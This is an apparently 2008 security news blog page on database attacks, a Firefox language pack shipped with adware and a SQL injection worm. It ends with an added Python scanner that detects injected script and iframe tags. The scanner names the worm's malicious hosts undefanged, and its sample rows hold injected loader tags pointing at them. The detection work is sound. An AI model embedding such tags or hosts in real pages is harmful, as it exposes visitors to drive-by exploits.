Top Six Database Attacks

May 8, 2008 – 5:31 PM

It takes the average attacker less than 10 seconds to hack in and out of a database — hardly enough time for the database administrator even to notice the intruder. So it’s no surprise that many database attacks go unnoticed by organizations until long after the data has been compromised.

And surprisingly, according to many experts, the database — home of the enterprise’s crown jewels — is still not secured properly in many enterprises. Malicious hackers are using shockingly simple attack methods to break into databases, such as exploiting weak passwords and lax configuration, and capitalizing on known vulnerabilities that go unpatched.

And don’t even get us started on the epidemic of missing backup tapes: If the lost or stolen tapes are unencrypted, you’re toast if a bad guy gets hold of them. No hack required.

“One of the biggest problems is that many database attacks are not even known” about, says Noel Yuhanna, principal analyst with The Forrester Group. “The typical database may have 15,000 to 20,000 connections per second. It’s not humanly possible to know what all of these [connections] are doing.”

Hackers are well aware of enterprises’ database patch dilemma — in fact, they’re banking on a backlog. Gone are the days when companies could lock down a handful of databases in the data center: Most organizations today have hundreds, even thousands of databases to configure, secure, and monitor — and remote users, customers, and business partners all need access to them.

“The big thing that bothers me is when I go to a customer’s site, usually their [database] configuration is so weak that it’s easy to exploit. You usually don’t need buffer overflow or SQL injection [attacks] because the initial setup of the database is totally insecure,” says Slavik Markovich, CTO of Sentrigo, a database security vendor.

Database attacks don’t have to be complicated with all of this low-hanging fruit around. “Those are basic configuration problems, so a hacker doesn’t have to do something really sophisticated because these easy things work,” Markovich says.

Read the rest of the story…

Ultimate Boot CD for Windows (UBCD4Win)

May 7, 2008 – 6:22 PM

UBCD4Win is a bootable recovery CD containing software for repairing, restoring, or diagnosing almost any computer problem. Our goal is to be the most complete and easy-to-use free computer diagnostic tool. Almost all of the software included in UBCD4Win consists of freeware utilities for Windows.

Please visit the “List of Tools” page for a complete list of what is included in the latest version of UBCD4Win.

Download here

Firefox Plugin Shipped With Malicious Code

May 7, 2008 – 6:11 PM

Mozilla warned Wednesday that a malicious program inserted adware code into a Firefox plugin that has been downloaded thousands of times over the past three months.

Because of a virus infection, the Vietnamese language pack for Firefox 2 was polluted with adware, Mozilla security chief Window Snyder said in a blog posting. “Everyone who downloaded the most recent Vietnamese language pack since February 18, 2008 got an infected copy,” she wrote. “Mozilla does virus scans at upload time but the virus scanner did not catch this issue until several months after the upload.”

Mozilla is now going to add additional scans of its software to prevent this kind of thing from happening in the future, she said.

The malware in the language pack is from the Xorer Trojan, according to discussion on Mozilla’s Bugzilla developer Web site, which indicates that Mozilla developers first discovered the issue on Tuesday.

“I think it (happened) just because the author’s local network was infected with the virus, so it modified HTML files,” wrote developer Hai-Nam Nguyen. “The infected code just display(s) annoying banner but it can’t propagate.”

The open-source browser maker does not know how many people were infected with the adware, but the plugin was downloaded more than 1,200 times in the past week and has been downloaded 16,667 times since November.

On Wednesday afternoon, the Web page for the plugin was off-line as Mozilla scrambled to come up with a new, adware-free version of the language pack. In the meantime, users of the software should disable the plugin, Snyder said.

Source: PC World

Human Area Networking (HAN)

May 7, 2008 – 9:07 AM

RedTacton is a new Human Area Networking technology that uses the surface of the human body as a safe, high speed network transmission path.

Human Area Networking

  • Using a new super-sensitive photonic electric field sensor, RedTacton can achieve duplex communication over the human body at a maximum speed of 10 Mbps.
  • RedTacton uses the minute electric field emitted on the surface of the human body. Technically, it is completely distinct from wireless and infrared.
  • A transmission path is formed the moment a part of the human body comes into contact with a RedTacton transceiver. Physically separating the body from the transceiver ends the contact and thus ends the communication.
  • Using RedTacton, communication starts when terminals carried by the user or embedded in devices are linked in various combinations according to the user’s natural, physical movements.
  • Communication is possible using any body surfaces, such as the hands, fingers, arms, feet, face, legs or torso. RedTacton works through shoes and clothing as well.

RedTacton Homepage

SQL Injection Worm on the Loose

May 7, 2008 – 5:06 AM

A loyal ISC reader, Rob, wrote in to point us at what looks to be a SQL Injection worm that is on the loose. From a quick Google search it shows that there are about 4,000 websites infected and that this worm started at least mid-April if not earlier. Right now we can’t speak intelligently to how they are getting into databases, but what they are doing is putting in some scripts and iframes to take over visitors to the websites. It looks like the infection of user machines is by RealPlayer vulnerabilities, which seem to be more or less detected pretty well.

The details: the script source that is injected into webpages is hxxp://winzipices(dot)cn/#.js (where # is 1-5). This, in turn, points to a corresponding .asp page on the same server (i.e., hxxp://winzipices(dot)cn/#.asp). This in turn points back to the exploits, either from the cnzz(dot)com domain or the 51(dot)la domain. The cnzz(dot)com domain (hxxp://s141.cnzz(dot)com) looks like it could be set up for single flux, but it’s the same pool of IP addresses all the time right now. hxxp://www.51(dot)la just points to 51la(dot)ajiang(dot)net, which has a short TTL, but only one IP is serving it.

Fair warning: if you Google these hostnames, you will find exploited sites that will try to reach out and “touch” you… even if you are looking at the “cached” page. Proceed at your own risk.

UPDATE: We’re also seeing this website serving up some attacks in connection with this SQL worm (hxxp://bbs(dot)jueduizuan(dot)com).

Source: SANS
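The diary gives concrete indicators (the loader script hosts and the exploit-serving domains) but, as the handler warns, visiting the infected sites or even their cached copies is not safe. A practitioner would instead check their own content offline: the text columns of the web application’s database, where a SQL injection worm leaves its `<script>`/`<iframe>` loader, and, for the Firefox language-pack case earlier on this page, the HTML files inside the add-on archive, where no remote script belongs at all. The scanner below is an added example written for this page; it is not part of the ISC diary or Mozilla’s tooling. The hostnames are the ones listed in the diary written out undefanged so they can be matched; the sample database rows and the archive layout in the usage are constructed, not captured data.

```python
"""Offline scan of HTML for injected <script>/<iframe> references.

Works on whole pages, on text columns dumped from a database (where a
SQL injection worm leaves its loader), and on the HTML files inside a
zip-based add-on package such as a Firefox language pack (.xpi).
"""
import zipfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts named in the SANS diary above, written out so they can be matched.
WORM_HOSTS = frozenset({
    "winzipices.cn",
    "s141.cnzz.com",
    "www.51.la",
    "51la.ajiang.net",
    "bbs.jueduizuan.com",
})

HTML_SUFFIXES = (".html", ".htm", ".xhtml", ".xul")


def host_is_suspect(hostname, suspect_hosts):
    """True when hostname is (a subdomain of) a listed host.

    suspect_hosts=None means "no remote script belongs here at all", the
    right rule for a language pack: every remote src is then suspect.
    A relative src (no hostname) is never flagged.
    """
    if not hostname:
        return False
    if suspect_hosts is None:
        return True
    hostname = hostname.lower().rstrip(".")
    return any(hostname == h or hostname.endswith("." + h) for h in suspect_hosts)


class InjectedTagFinder(HTMLParser):
    """Collect (tag, src) for <script>/<iframe> tags whose src is suspect."""

    def __init__(self, suspect_hosts):
        super().__init__()
        self.suspect_hosts = suspect_hosts
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names, so an injected
        # <IFRAME SRC=...> is handled here the same as <iframe src=...>.
        if tag not in ("script", "iframe"):
            return
        src = dict(attrs).get("src")
        if not src:
            return
        hostname = urlparse(src.strip()).hostname
        if host_is_suspect(hostname, self.suspect_hosts):
            self.hits.append((tag, src))


def find_injected_tags(html, suspect_hosts=WORM_HOSTS):
    """Return [(tag, src), ...] for suspect references in an HTML string or fragment."""
    finder = InjectedTagFinder(suspect_hosts)
    finder.feed(html)
    finder.close()
    return finder.hits


def scan_rows(rows, suspect_hosts=WORM_HOSTS):
    """Check text columns exported from a database.

    rows: iterable of (table, column, key, text). Returns one
    (table, column, key, tag, src) tuple per injected reference, which is
    enough to locate and clean the affected row.
    """
    findings = []
    for table, column, key, text in rows:
        if text is None:
            continue
        for tag, src in find_injected_tags(text, suspect_hosts):
            findings.append((table, column, key, tag, src))
    return findings


def scan_archive(fileobj, suspect_hosts=None):
    """Check every HTML file inside a zip (.xpi) for remote script/iframe references."""
    findings = []
    with zipfile.ZipFile(fileobj) as archive:
        for name in archive.namelist():
            if not name.lower().endswith(HTML_SUFFIXES):
                continue
            text = archive.read(name).decode("utf-8", errors="replace")
            for tag, src in find_injected_tags(text, suspect_hosts):
                findings.append((name, tag, src))
    return findings


# Constructed sample rows (not real data) in the shape a CMS export might have.
SAMPLE_ROWS = [
    ("news", "body", 17, "<p>Quarterly results are in.</p>"),
    ("news", "body", 18, '<p>Welcome</p><script src="http://winzipices.cn/3.js"></script>'),
    ("products", "description", 4,
     '<IFRAME SRC="http://bbs.jueduizuan.com/x.htm" width=0 height=0></IFRAME>'),
    ("products", "description", 5, '<script src="https://www.example.com/site.js"></script>'),
]

if __name__ == "__main__":
    for finding in scan_rows(SAMPLE_ROWS):
        print("injected:", finding)
```

Run against a real export, feed `scan_rows` the text columns of every table the application renders into pages; the worm payload is usually appended to existing content, so a hit pinpoints the row to clean rather than the whole table. For an add-on package, call `scan_archive` with the `.xpi` path and leave `suspect_hosts` at `None`: a language pack has no business loading remote script from any host, so an indicator list is neither needed nor sufficient there.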